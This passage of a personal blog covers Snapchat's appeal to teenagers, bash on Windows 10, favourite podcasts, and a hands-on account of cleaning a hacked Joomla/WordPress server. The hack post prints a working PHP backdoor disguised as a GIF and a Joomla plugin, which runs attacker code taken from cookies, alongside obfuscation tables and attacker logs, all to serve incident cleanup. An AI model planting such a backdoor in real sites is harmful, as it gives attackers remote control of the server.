    Around that same time, in 2013, I watched the founders of Snapchat explain their app on the Colbert Report and I was intrigued. And not because, let’s be honest here, this was a sexting app (or at least a very naughty app). Disappearing photos? You know what’s up. So I could see why this would be popular for dubious reasons. But my intrigue was triggered by a technical aspect: these guys didn’t have to store anything! Until then, having a popular social web app meant having big storage. And unlike Facebook, Flickr, Instagram, YouTube, Vine and Tumblr, which have to store costly petabytes of photos and videos, these guys seemingly found a way around this. Respectable!

    But at that point, aside from using it for sending explicit pics, I just couldn’t get why you would want to take a decent picture, send it to a friend and have it disappear. Maybe this was something only young kids understand, but why?

    Youth

    A lot is being said about the app’s specific appeal to teenagers/young people that have no interest in Facebook or Twitter. Because they identify these platforms as something for old people (i.e. uncool) and Snapchat is not. So they seem to get it, where everyone else has a hard time understanding it. But I think there are 4 reasons why Snapchat would appeal to this specific group in the first place.

    Because I am not a teenager and because I grew up in a time before the internet my mind works differently than that of a teenager. For me a photo has value, whether it is digital or not. Because I can remember the first digital cameras, and I remember before that, that taking pictures with the family was a thing you dressed up for. So to me, photos mean something, and you cherish photos. But, say you are born in 2000-something. Knowing that the iPhone came out in 2007, that means you have never really lived in a world without an abundance of digital photos. Photos are easy and everywhere, so to you they are not important keepsakes. Reason 1.

    Because Snapchat doesn’t keep track, you can’t really tell how popular you or anybody else is. It’s low pressure. There are no numbers to keep up with. The popularity contest that dominates every other aspect of teenage life is eliminated. Anyone can join. Reason 2.

    Snapchat is about NOW. The moment. Who cares what you did last week? Where are you now, what are you doing, who are you hanging out with, whose party are you at, what friends are you having over. That is the only thing that matters. And for a demographic who are mainly preoccupied discovering their own identity based on what other people/friends are doing now this is key. Reason 3.

    Snapchat’s interface is often the main thing people don’t understand. It causes confusion. But as stated earlier, this is because people have come to expect a certain context that is just not there. And as cryptic as the interface might seem, after you grasp it, Snapchat has one of the best interfaces around for creating content. This cannot be emphasized enough. No computers, no difficult editing program. Right there in the app: edit, add, caption, draw, create, make it your own creation. Super easy, fun and fast. Reason 4.

    And on top of these 4 reasons, the sneakiness that goes with disappearing photos probably also contributed to the success in the beginning. However, Snapchat is not the app it used to be and people of all ages are coming to Snapchat now.

    Pivoting

    Snapchat started out as a one-on-one/one-to-many photo messaging app for disappearing photos that felt personal. This was the first two years or so. But the most brilliant move they made is that they were able to see the possibility and pivot to a new use of snaps with stories. And the app completely changed with this.

    Stories are publicly available snaps (videos or photos) concatenated together for a maximum of 24 hours. Creators can keep adding snaps to their story and the interface makes it very easy to pick up where they left off. It is near-real-time video for everyone, not just one-on-one.

    And stories are mainly where everything is happening now. YouTube, Vine and Instagram stars are flocking to Snapchat for this reason. Content creation is easy and fun: no editing, no uploading, just snapping. And viewing, keeping track of someone’s story, is also easy (and a lot of stories are videos). Following these stories has a unique, personal and real feel to it. I follow a bunch of VC and tech guys that give advice on companies, startups, failing, building teams, all that stuff, and it’s like they’re talking directly to you, unedited, unscripted. And you can directly interact with them (snap them). So it’s much more engaging and a rather different experience from YouTube or even a podcast (which comes close, but isn’t visual or near real time). You are in the moment with them.

    It could have hardly been a planned move from the get go for Snapchat to implement stories so I give them credit for being able to pivot like this from one-on-one disappearing photos to a near-real-time streaming video platform.

    What’s next

    I see a lot of Instagram, YouTube and Vine stars moving to Snapchat. And because of that, Snapchat is snowballing hard into the mainstream. Also because more and more people are seeing the fun or benefit in sharing real-time photos/videos and being in the moment. In that sense Snapchat is inching closer to the human experience: real-time, unedited conversations. You know, like when you talk to people.

    Also something I figured out recently: Snapchat is basically closer to early radio and television than it is to Facebook or YouTube. Tune in, listen and/or watch. And if you don’t, it’s gone. It has a much more ethereal feel to it. So from that viewpoint it seems we’re coming full circle.

    Snapchat itself is of course doing well. Money and seemingly crazy or even crazier valuations are being thrown at them like you’d expect for a popular app. And they’re spending like you would expect also. And even though they seem to have a business model with the Discover tab (basically paid stories by brands) it is not generating that much at the moment. But they probably don’t mind too much and are 100% focused on growing their user base. As long as you can keep that up, VC money will flow.

    But what is important here is that real-time video is one of the most fascinating developments on the internet right now (next to AI and VR). Periscope, Meerkat, Kamcord, Twitch and YouTube are also gearing up and trying to take some of the pie here. And it wouldn’t surprise me if Facebook starts introducing the option to have posts available for only a certain amount of time or concatenate (video) posts. So interesting developments, to say the least! And I will keep following these developments because after all, this is not about Snapchat, this is about the human race bending technology to fit human needs.

  • Ubuntu on Windows

    Today’s big news is that Microsoft has made bash available on Windows 10. No container, no virtual machine, no recompiled sources:

    Here, we’re talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows.

    This opens up a world of possibilities. A world that was previously also within reach, albeit with lesser solutions.

    This means being able to use awk, grep, find, vim, wget, ls, git(!), package management and everything that is awesome and sane, from within Windows 10 natively. Sounds pretty sweet, right?

    I’m guessing this will be hugely successful (and make a whole bunch of other tools obsolete). A big part of the greatness and goodness of working with a GNU/Linux system has been ripped out and made available on Windows. There are *a lot* of people working with git and Visual Studio that will cry tears of joy. Because, let’s face it, that’s one of the main reasons for this move. But that is just one subset of users; there are so many more that will discover the (real) power of the command line and the power of package management that comes with it (that might even be the real benefit). So Microsoft improves the usability of Windows and, while doing so, casually punches Apple’s Mac OS X in the face. OS X is partly regarded/respected as a great developer OS mainly because it has a proper shell.

    So a lot of people seem excited, but a bunch of people closely related to GNU/Linux aren’t that vocal (yet). Or maybe they’re unfazed, uninterested?

    Maybe it’s because this whole thing raises the question: what does this mean for free and open source software and GNU/Linux in particular? (This was supposed to be the year of the DESKTOP LINUX!)

    There are roughly two ways to differently phrase what has happened:

    1. “A multi-billion dollar corporation with almost an omnipresence on the desktop computer notices it’s missing something that is readily available with other competing solutions, and decides to cherry-pick the greatest parts of those competitors and incorporate them in its own solution. An ‘if you can’t beat ’em, join ’em’ strategy.”
    2. “Computing and software is becoming more fluid, and an OS doesn’t have the clear boundaries it used to have; it is just made up of whatever the best ideas are, ideas that are expressed by software and thus interconnect via APIs and can be glued together to make the best possible solution to fit your needs. And that big multi-billion dollar company wants the best solution.”

    If you like that last idea, I have news for you. This is exactly the idea behind GNU/Linux, and it already exists. So my guess is that the GNU/Linux community seems unfazed because they think: instead of being excited and giddy for all this you could just install Ubuntu.

    And this is where the sticky part is. The openness of GPL software makes way for this current Microsoft approach, but it also bites itself in the butt. Using bash in such a way and incorporating this free and open software within a closed OS suffocates the ideas of the GPL and dilutes its purpose. Because Microsoft is not GPL-ing/open-sourcing its own code base (sure, small parts), it’s just using the best parts and sticking to its own strategy. It’s a smart, clever and tactically strong move and it will be very successful. But GPL software thrives and exists because of other GPL software, and this approach works and creates beautiful things (take for instance how GCC made way for Linux, which made way for a gazillion other tools etc.). There is a viral aspect to the GPL that will be completely cut off. GPL software in a non-GPL environment has a harder time reaching its potential.

    It strikes me that the people who are excited might not really understand or care for the GPL (or licensing in general). They just look at it from a user perspective and think: “hey, I get the best of both worlds”. That’s fine and I’m not arguing against that (software is made for the users after all). But a critical aspect here is that they seem to forget that this software only got this far because of exactly this license. It’s a fundamental and integral part of its success and quality.

    Since what just happened was completely unheard of throughout the ’90s and ’00s, I don’t think either side would have guessed this would ever happen. But it did. Just like a couple of weeks ago, when Microsoft decided to create its own Linux version to support SQL Server on Linux. So even stranger things might happen and I’m trying to keep an open mind. I’m not against this current move and will probably even use it myself at some point, but if this is it, and it’s just taking and not giving, it will not benefit GNU software in the long run.

    Personally, I really think the nature of software is and should be fluid and so it should be able to be stitched together to create what you need. But this only works really well, if all parts of the ‘quilt’ follow the same rules.

  • My Favorite Podcasts

    So you read the previous post and now you’re wondering what podcasts to listen to. Well you’re in luck, because this post will tell you.

    What’s to like?

    But first, why listen to podcasts anyway? Sure enough, it might not be for everyone. But if you don’t mind listening to people talking, you should be alright. I myself am a pretty big (public) talk radio fan. Mostly because public radio doesn’t play my type of music anyway, but also because I like listening to people discussing things. And there are, of course, a lot of similarities between talk radio and podcasts. But for now I seem to like podcasts better:

    • Podcasts are a bit more relaxed. Radio is usually all over the place, hopping from one item to the next caller, shifting between Syria and the economic crises right before going to the news, but not before commercials. Podcasts have more focus.
    • Radio is a drop-in experience. Whatever they were already talking about they will keep talking and you’re more of a bystander. Podcast are more immersive and you can get the complete picture.
    • Radio decides what they talk about. I admit that this can generally be a good thing, because you will be exposed to otherwise different subjects/opinions. But (see the first point) to keep things interesting radio hardly “goes deep” and tends to hop from subject to subject. Podcasts create more depth.
    • Because of this focus on one or a couple of subjects you can really learn something. Podcasts will make you smarter!

    There are tons of podcasts out there. Pick any subject you’d like, there is probably a podcast about it. With podcasts being an internet thing it is no coincidence that a lot of podcasts are about (internet) technology. That is just fine by me though.

    Two types

    In my mind there are 2 types of podcasts. On one side you have 2 or more people talking off the cuff about loosely predefined subjects, usually recorded in one go. These podcasts tend to be more topical. And therefore make less sense to listen to much later, because the subject matter might be outdated by then.

    And on the other side are the shows that deal with one specific subject, question or theme. They usually have soundbites, interview parts and try to answer questions. These shows are much more timeless (for lack of a better word). So I will break my favorites down in these two categories.

    Topical

    AppelsenPeren

    Disclaimer: this one is Dutch. It was one of the first ones I started listening to and it’s also one of my favorites, because they have a broad theme: anything future-related. Of course this means a lot of Apple and Elon Musk. But that is just fine. The content appeals, but it is also similar to discussions I have with friends, both topic-wise and mood-wise: a couple of guys geeking out. Highly recommended.

    ATP

    ATP (Accidental Tech Podcast) is perhaps one of the more famous podcasts, featuring podcast heavyweights Marco Arment and John Siracusa, accompanied by Casey Liss. Lots of Apple-related tech talk.

    Around 1,5-2 hours (with a fun outro jingle).

    Timeless

    Freakonomics

    The Freakonomics podcast is hosted by one of the writers of one of my favorite books with the same name. It deals with lots of different subjects and tries to show the hidden side of things. Something I always really like.

    Under the Radar

    Under the Radar is a relatively new podcast with (yet again) Marco Arment and David Smith, two independent Apple app developers that discuss everything they come across while developing apps.

    No longer than 30 minutes.

    McKinsey

    Up next is also a new podcast: the McKinsey podcast. This one holds the distinction of being the only podcast I saved after listening. It was their first episode, about innovation; it has terrible sound quality but it’s about an extremely interesting subject.

    99% Invisible

    99% Invisible is in my top three favorite podcasts. It says it is about architecture, but I hardly notice this, because it’s about a lot of different things: the history of drinking fountains, the game Monopoly, or the strange history of the worst smell in the world (from gimmick to invaluable tool). Also about the hidden side of things (hence the name, I think).

    Recorded in beautiful downtown Oakland, California.

    Planet Money

    Planet Money: I would argue that this is probably my favorite podcast. The name sounds a bit boring, but you will learn something and come away smarter, every time. It shares the hallmark of 99% Invisible and Freakonomics in trying to show you the different side of things. Subject matter is diverse, it is the right length (one car drive long) and I’ve never heard a boring one.

    Runners up are: This American Life (fun, but long), Inquisitive (favorite albums; depends on the album) and Serial (just started, very good so far). I tend to like the shorter podcasts better (e.g. The Talk Show and The Incomparable: I’ve listened to a few of them, but they are way too long for my taste).

    Bonus: just recently I started to keep track of the podcasts I’ve listened to.

    So there you go! Question remains, what is your favorite podcast?

  • Podcast Renaissance

    ren·ais·sance (rĕn′ĭ-säns′, -zäns′, rĭ-nā′səns)
    1. A rebirth or revival.
    2. A situation or period of time when there is a new interest in something that has not been popular in a long time.

    Podcasts have been around for years. I never really had a particular interest in them. I mean, it’s literally an MP3 of people talking. How hard is that? That can’t be very interesting. So in my memory, podcasts went as quickly as they came. But in fact, they never went away.
    Instead, there is an entire online subculture where podcast quality and interest in podcasts is steadily growing. And so this year a funny thing happened; there were several occasions where people started pointing me to interesting podcasts. When things like that happen, I take notice. And over the last months podcasts have become a very rich and enjoyable medium for me (more on that in a later post).

    Maybe I have been living under a rock, and you have always been aware of podcasts and their value. And I was just blind. But I don’t think that is the case. It seems podcasts are becoming increasingly more popular. And it feels as if we are entering an age of podcast renaissance and “Big Money” is coming.

    https://twitter.com/marcoarment/status/653963266000031748

    Of course Marco Arment is one of the most well-known podcasters. He produces several podcasts and is pushing the medium forward by creating a podcast app: Overcast.

    Although this is the general consensus on his show, shared by other well-known podcasters, you don’t have to take his word for it. Because there are other signs too. These are things I noticed:

    • The Serial podcast from 2014 really broke new ground in what the medium can do. This is also one of the podcasts people kept pointing me to. I think Serial opened up the world of podcasting for a lot of people.
    • Mainstream media like SNL are doing skits about podcasts.
    • Ted.com, the well-known platform for inspiring talks, is inviting podcasters to do a live recording of a podcast in front of an audience, which they film and put online.
    • Established authorities like McKinsey are starting new podcasts.
    • New podcast networks like RelayFM (from 2014) keep adding more and more quality shows and developing a business model around podcasting.
    • Sites like Podcast Chart are being started.

    So things are brewing beneath the surface. And there is a sense that things might change real soon. I’m curious to see what happens.

    Of course one of the great things of podcasting is that it is a completely decentralized medium. You can grab your podcast straight from a website or from Soundcloud, or via RSS, or the iPhone app, or the Overcast app or maybe someone sends you a Dropbox link. It’s just an MP3 right? Nobody owns podcasts or podcasting.

    https://twitter.com/marcoarment/status/649332852711145472

    So it’s definitely not like YouTube where the vlogging revolution started, with everything in one place. So it will be interesting to see where this can go. Can a decentralized medium really take off or are we already at peak-podcast?

    (In my next post I will discuss what’s to like about podcasts and which are my favorite ones.)

  • How this site got hacked

    (This is a crosspost from my other blog, that actually got hacked. This is for you, a Google search user, struggling with a hacked website).

    Last week I noticed some strange behaviour on my site. When clicking a link on the front page I would be redirected to the same front page, effectively rendering my site useless.

    What was going on?

    I quickly noticed my .htaccess was causing the problem. It was redirecting incorrectly. Strange, but just a little mix-up, I thought. A quick change to the .htaccess file would fix that. However, after the fix it would work exactly one time!

    Uh?!

    Something was rewriting my .htaccess file on the fly (specifically, with the first click). But what, and why? To figure this out I changed the permissions on my .htaccess file.

    chown root.root .htaccess

    This would prevent whatever was rewriting my file from rewriting it. Unless it was also running as root, which would be a bigger problem. But at this point I had no reason to assume a user other than the web user was causing this. So let’s check the error.log, shall we?

    [Thu Nov 05 14:49:33 2015] [error] [client] PHP Warning: chmod(): Operation not permitted in /var/www/piks.nl/wordpress/wp-includes/nav-menu.php on line 538
    [Thu Nov 05 14:49:33 2015] [error] [client] PHP Warning: file_put_contents(/var/www/piks.nl/wordpress/wp-includes/../.htaccess): failed to open stream: Permission denied in /var/www/piks.nl/wordpress/wp-includes/nav-menu.php on line 539
    [Thu Nov 05 14:49:33 2015] [error] [client] PHP Warning: chmod(): Operation not permitted in /var/www/piks.nl/wordpress/wp-includes/nav-menu.php on line 540
    [Thu Nov 05 14:49:33 2015] [error] [client] PHP Warning: touch(): Utime failed: Operation not permitted in /var/www/piks.nl/wordpress/wp-includes/nav-menu.php on line 544

    Aha, well this is obvious, nav-menu.php is trying to rewrite my .htaccess file. But nav-menu.php is a regular WordPress file, so what’s up? Let’s check the content of the file. It seemed extra PHP code was added to the top of the file that rewrote the .htaccess file AND also tried contacting an external server. Something that could be observed with a tcpdump.

    tcpdump -i eth0 -n port 80
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
    15:13:07.917228 IP myclientip.59912 > 149.210.186.110.80: Flags [.], ack 1, win 16425, length 0
    15:13:07.917479 IP myclientip.59912 > 149.210.186.110.80: Flags [P.], seq 1:634, ack 1, win 16425, length 633
    15:13:07.917507 IP 149.210.186.110.80 > myclientip.59912: Flags [.], ack 634, win 992, length 0
    15:13:07.918554 IP 149.210.186.110.80 > myclientip.59912: Flags [P.], seq 1:335, ack 634, win 992, length 334
    15:13:07.927313 IP myclientip.59912 > 149.210.186.110.80: Flags [P.], seq 634:1880, ack 335, win 16341, length 1246
    15:13:07.964289 IP 149.210.186.110.80 > myclientip.59912: Flags [.], ack 1880, win 1148, length 0
    15:13:08.073720 IP 149.210.186.110.50809 > 195.28.182.78.80: Flags [S], seq 1257405992, win 14600, options [mss 1460,sackOK,TS val 431078511 ecr 0,nop,wscale 4], length 0

    Well excuse me! But that last line is wrong: 149.210.186.110.50809 > 195.28.182.78.80. My webserver is contacting a different webserver (like it’s a client instead of a server). Not what I want! I don’t know why it does that or what for, but this is not normal.

    So OK, I know what is causing the .htaccess rewrite but HOW did the nav-menu.php file get changed?! This is where my headache sort of started. WordPress was up to date, all plugins were OK, I couldn’t figure it out. How did this happen? A couple of months ago I changed things around a bit, installed several themes and plugins and deleted just as many. My guess was that I used a faulty plugin (that I maybe already deleted). But which one? The logs didn’t give any explanation.

    Sucuri and Wordfence

    While trying to debug this I came across two excellent tools. When you run a WordPress site you should install Sucuri Security and Wordfence. They will help you.

    Sucuri can scan your site and check the regular WordPress files against your files to tell which are different (nav-menu.php popped up of course).

    Sucuri does a lot more, but this was helpful. Wordfence was also helpful; it can provide the same thing, but it can also email you when files change or when users try to hack/log in to your admin account. Very handy. (And this tool can also do a whole lot more.)

    But, both tools didn’t provide an answer.

    After googling a bit, I ran into this site. This script recursively checks ALL your files and will order them with the newest on top. Very, VERY handy. Because I noticed that when you ls a directory you will get a different timestamp than the actual last-modified time. It’s a little trick to mess with you. This way a hacker will hide modified scripts from you, because naturally you would look for recently changed files. And this script will cut right through that! (Using stat on Linux will also show you the right dates.)
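
    For what it’s worth, here is a rough Python sketch of the same idea (not the script from that site): walk a directory tree and list files newest first, showing both the modification time and the change time, since the change time (ctime) is harder to fake than the mtime that ls shows.

    import os
    import sys
    import time

    root = sys.argv[1] if len(sys.argv) > 1 else "."
    entries = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:
                continue  # broken symlinks, permission errors
            entries.append((st.st_mtime, st.st_ctime, path))

    # newest 50 files first, with modification and change times side by side
    fmt = "%Y-%m-%d %H:%M:%S"
    for mtime, ctime, path in sorted(entries, reverse=True)[:50]:
        print(time.strftime(fmt, time.localtime(mtime)), time.strftime(fmt, time.localtime(ctime)), path)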

    So yes, nav-menu.php showed up. But nothing else. So no answers. Then it began to dawn on me: I host a few other sites on the same server. What if one of those sites was hacked and infected my WordPress site? Of course! That had to be it. Even more so because one of those sites is a Joomla 1.5 installation (with reason). So let’s install the file_list_4_sort_by_date.php script on those sites.

    Pop pop pop. This didn’t look good. The Joomla site was indeed hacked and there were a whole lot of randomly placed files on the site. Oh no. However, this all seemed to have happened in the last 48 hours. And it was done in such a way that the actual site was operating perfectly (as opposed to my WordPress site). But it was an ugly mess. Several different backdoors, which got hit by hundreds of different (of course spoofed) IP addresses, to upload even more backdoors and phishing pages. Time to clean up! (And find out what caused this and how!)

    Eval = evil (as is base64_encode)

    So I’m stuck with a whole bunch of new scripts, but worse, there are also script lines added to my own/existing files. Those are a whole lot trickier to clean. First, I need to make sure all my PHP files can’t be edited anymore (I should have done this sooner):

    find . -type f -name "*.php" | xargs chmod 444

    So that takes care of that. Some files are easy to figure out whether they need to be there, others not so much. This is why Wordfence/Sucuri is so awesome. But I couldn’t really find such a plugin for Joomla, so I had to diff it manually. Luckily I make rsync backups of my server, so I could diff the entire content of the backup against the current site:

    diff -r mybackupdirectory thecurrentsitedirectory

    This showed me the differences and I could just delete the added files. For the files that were changed, here is what sticks out. They’re usually using the PHP ‘eval‘ function (if you find a PHP script that uses the eval function, beware!). What’s more, they use the ‘base64_encode‘ function. What this does is make the script unreadable to humans (normally this function is used to transport binary data, e.g. photos, as text). This is to make sure that when you get your hands on these scripts/backdoors, you can’t really tell what they do. And yes, you can decode it, but what if the decoded text is also base64 encoded, and that is also encoded etc. etc. And on top of that they encrypted the file with this:

    $calntd = Array('1'=>'N', '0'=>'m', '3'=>'I', '2'=>'x', '5'=>'e', '4'=>'J', '7'=>'a', '6'=>'L', '9'=>'6', '8'=>'c', 'A'=>'p', 'C'=>'u', 'B'=>'W', 'E'=>'3', 'D'=>'T', 'G'=>'t', 'F'=>'K', 'I'=>'4', 'H'=>'M', 'K'=>'E', 'J'=>'X', 'M'=>'R', 'L'=>'k', 'O'=>'1', 'N'=>'V', 'Q'=>'Y', 'P'=>'Q', 'S'=>'G', 'R'=>'P', 'U'=>'U', 'T'=>'B', 'W'=>'w', 'V'=>'0', 'Y'=>'S', 'X'=>'v', 'Z'=>'y', 'a'=>'g', 'c'=>'O', 'b'=>'f', 'e'=>'F', 'd'=>'l', 'g'=>'C', 'f'=>'2', 'i'=>'j', 'h'=>'7', 'k'=>'8', 'j'=>'i', 'm'=>'h', 'l'=>'5', 'o'=>'q', 'n'=>'z', 'q'=>'d', 'p'=>'o', 's'=>'D', 'r'=>'r', 'u'=>'H', 't'=>'b', 'w'=>'A', 'v'=>'9', 'y'=>'n', 'x'=>'Z', 'z'=>'s');
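
    (A table like that is typically applied with PHP’s strtr(). If you really wanted to peel a layer off, a toy Python sketch could look like the following. It assumes the payload is simply run through this substitution map and then base64-decoded; in practice the layers are often nested, so consider it one step of the onion.)

    import base64

    # the substitution table from the malware above, copied as a Python dict
    CALNTD = {
        '1': 'N', '0': 'm', '3': 'I', '2': 'x', '5': 'e', '4': 'J', '7': 'a', '6': 'L',
        '9': '6', '8': 'c', 'A': 'p', 'C': 'u', 'B': 'W', 'E': '3', 'D': 'T', 'G': 't',
        'F': 'K', 'I': '4', 'H': 'M', 'K': 'E', 'J': 'X', 'M': 'R', 'L': 'k', 'O': '1',
        'N': 'V', 'Q': 'Y', 'P': 'Q', 'S': 'G', 'R': 'P', 'U': 'U', 'T': 'B', 'W': 'w',
        'V': '0', 'Y': 'S', 'X': 'v', 'Z': 'y', 'a': 'g', 'c': 'O', 'b': 'f', 'e': 'F',
        'd': 'l', 'g': 'C', 'f': '2', 'i': 'j', 'h': '7', 'k': '8', 'j': 'i', 'm': 'h',
        'l': '5', 'o': 'q', 'n': 'z', 'q': 'd', 'p': 'o', 's': 'D', 'r': 'r', 'u': 'H',
        't': 'b', 'w': 'A', 'v': '9', 'y': 'n', 'x': 'Z', 'z': 's',
    }

    def unscramble(blob: str) -> bytes:
        swapped = blob.translate(str.maketrans(CALNTD))  # character-for-character swap
        return base64.b64decode(swapped)                 # then undo the base64 layer

    # print(unscramble("...captured payload goes here..."))
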
    So yes, in theory you could decode and decrypt it. But at this point, who cares? You can run these commands to get a list of which PHP files on your system use these functions (some are legit, although very few):

    find . -type f -name "*.php" | xargs grep eval\(
    find . -type f -name "*.php" | xargs grep base64_encode

    So yeah, this helped finding infected files and cleaning up the mess. But where did this start? If you can upload one file you can upload the rest and take control. But where and how did this happen? It is pretty hard to debug the logs, because a hacker will use different spoofed IP addresses. So there can be 2000 log lines, all from different addresses. But the key is to look for POST log lines. Most webserver requests are GET requests, but when something is trying to upload/change something, this will be done with a POST request:

    grep POST /var/log/apache2/access_log

    As said there were a bunch of different IPs and POST lines. So this made it tricky.
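
    If you want a quick overview instead of scrolling through grep output, a small Python sketch like this (log path taken from the command above) tallies the POST requests per requested path, which is more useful here than grouping by spoofed client IPs:

    from collections import Counter

    hits = Counter()
    with open("/var/log/apache2/access_log") as log:
        for line in log:
            parts = line.split('"')
            if len(parts) < 2:
                continue
            # parts[1] looks like: POST /components/com_content/models.php HTTP/1.1
            fields = parts[1].split()
            if len(fields) >= 2 and fields[0] == "POST":
                hits[fields[1]] += 1

    # the ten most POSTed-to paths
    for path, count in hits.most_common(10):
        print(f"{count:5d}  {path}")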

    But one of the earliest log lines before the mess started was this:

    78.138.106.243 - - [04/Nov/2015:12:22:39 +0100] "GET / HTTP/1.1" 200 84301 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:12:23:22 +0100] "GET / HTTP/1.1" 301 559 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:12:49:58 +0100] "GET /.config.php HTTP/1.1" 200 4769 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:12:51:38 +0100] "GET /.config.php HTTP/1.1" 301 581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:12:51:39 +0100] "GET /.config.php HTTP/1.1" 200 4769 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:01:08 +0100] "GET /.cpanel_config.php HTTP/1.1" 404 481 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:01:46 +0100] "GET /.cpanel_config.php HTTP/1.1" 301 595 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:01:46 +0100] "GET /.cpanel_config.php HTTP/1.1" 404 489 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:07:12 +0100] "GET /images/.jindex.php HTTP/1.1" 404 481 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:07:56 +0100] "GET /images/.jindex.php HTTP/1.1" 301 595 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:07:56 +0100] "GET /images/.jindex.php HTTP/1.1" 404 489 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:42:37 +0100] "GET /.config.php HTTP/1.1" 200 202 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:43:53 +0100] "GET /.config.php HTTP/1.1" 301 581 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:43:53 +0100] "GET /.config.php HTTP/1.1" 200 202 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:55:09 +0100] "GET /components/com_content/models.php HTTP/1.1" 200 507 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:55:28 +0100] "GET /components/com_content/models.php HTTP/1.1" 301 625 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:13:55:28 +0100] "GET /components/com_content/models.php HTTP/1.1" 200 507 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
    78.138.106.243 - - [04/Nov/2015:14:01:42 +0100] "POST /components/com_content/models.php HTTP/1.1" 200 385 "-" "Mozilla/5.0 (X11; U; Windows XP; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"
    78.138.106.243 - - [04/Nov/2015:14:01:42 +0100] "POST /components/com_content/models.php HTTP/1.1" 200 410 "-" "Mozilla/5.0 (X11; U; Windows XP; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"
    78.138.106.243 - - [04/Nov/2015:14:02:15 +0100] "POST /components/com_content/models.php HTTP/1.1" 301 625 "-" "Mozilla/5.0 (X11; U; Windows XP; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1"

    Well excuse me! How can this be? A couple of wrong/non-existing/404 GET requests, followed by two successful/200 GET requests to a file called .config.php, and then BOOM: a successful POST to a never-before-seen file called models.php, which is a backdoor. How, what, wait, why, uh?

    What is this .config.php file?

    This file didn’t pop up from the earlier diff. So my guess was this was a regular Joomla file that was always there. Let’s have a closer inspection.

    GIF89a
    <?php
    /**
     * @package     Joomla.Plugin
     * @subpackage  system.instantsuggest
     *
     * @copyright   Copyright (C) 2013 InstantSuggest.com. All rights reserved.
     * @license     GNU General Public License version 2 or later
     */
    /**
     * Instant Suggest Ajax
     *
     * @package     Joomla.Plugin
     * @subpackage  system.instantsuggest
     * @since       3.1
     */
    class PlgSystemInstantSuggest
    {
            public function __construct() {
                    $filter = @$_COOKIE['p3'];
                    if ($filter) {
                            $option = $filter(@$_COOKIE['p2']);
                            $auth = $filter(@$_COOKIE['p1']);
                            $option("/123/e",$auth,123);
                            die();
                    }
            }
    }
    $suggest = new PlgSystemInstantSuggest;

    This doesn’t look good. For several reasons:

    1. It’s a strange name: .config.php
    2. The first line says GIF89a. But this is definitely not a GIF file. Usually adding such a ‘header’ is to fool anti-viral programs.
    3. The function PlgSystemInstantSuggest isn’t used anywhere on the site. How do I know this? Because this came up empty:

    find -type f -name "*.php"| xargs grep PlgSystemInstantSuggest

    Google explained it.

    So this file doesn’t belong here and was apparently the start of all this trouble. But still the question remained: how did it get here? Let’s check the creation date:

    # stat .config.php
    File: `.config.php'
    Size: 661 Blocks: 8 IO Block: 4096 regular file
    Device: fe01h/65025d Inode: 2623182 Links: 1
    Access: (0444/-r--r--r--) Uid: ( 33/www-data) Gid: ( 33/www-data)
    Access: 2015-11-09 09:48:30.620041031 +0100
    Modify: 2015-01-21 18:55:29.062864009 +0100
    Change: 2015-11-07 19:16:00.832040969 +0100

    January 21 you say? Let’s check the logfiles (yes, I keep those around).
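
    Something along these lines digs up that minute (the log path and rotation scheme are assumptions about my setup; point it at wherever your vhost logs live):

    # mtime of .config.php was 2015-01-21 18:55:29, so search the rotated
    # (possibly gzipped) access logs for that minute
    zgrep "21/Jan/2015:18:55" /var/log/apache2/access.log*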

